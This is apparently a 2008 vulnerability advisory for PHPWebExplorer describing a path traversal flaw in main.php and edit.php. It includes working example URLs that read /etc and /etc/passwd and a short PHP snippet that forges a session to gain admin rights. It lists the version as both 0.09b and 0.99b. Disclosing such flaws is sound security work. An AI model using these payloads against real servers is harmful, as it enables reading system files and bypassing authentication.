PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability

2008.10.10
Credit: Pepelux
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PHPWebExplorer <= 0.09b: Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Program: PHPWebExplorer $ File(s) affected: main.php / edit.php $ Version: 0.99b $ Download: http://sourceforge.net/projects/phpwebexplorer/ Found by Pepelux <pepelux[at]enye-sec.org> eNYe-Sec - www.enye-sec.org -- Exploit -- If you have access to the control panel: http://localhost/main.php?refer=d&d=../../../etc http://localhost/edit.php?file=../../../etc/passwd If you are not a register user but you have access to write any file to the server (ex: a shared server where you can create an account) you can win admin privileges creating and executing a simple PHP: <? session_start(); $_SESSION['logged_in']='user1'; ?>

References:

http://xforce.iss.net/xforce/xfdb/45691
http://www.securityfocus.com/bid/31595
http://marc.info/?l=bugtraq&amp;m=122332154511973&amp;w=2


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top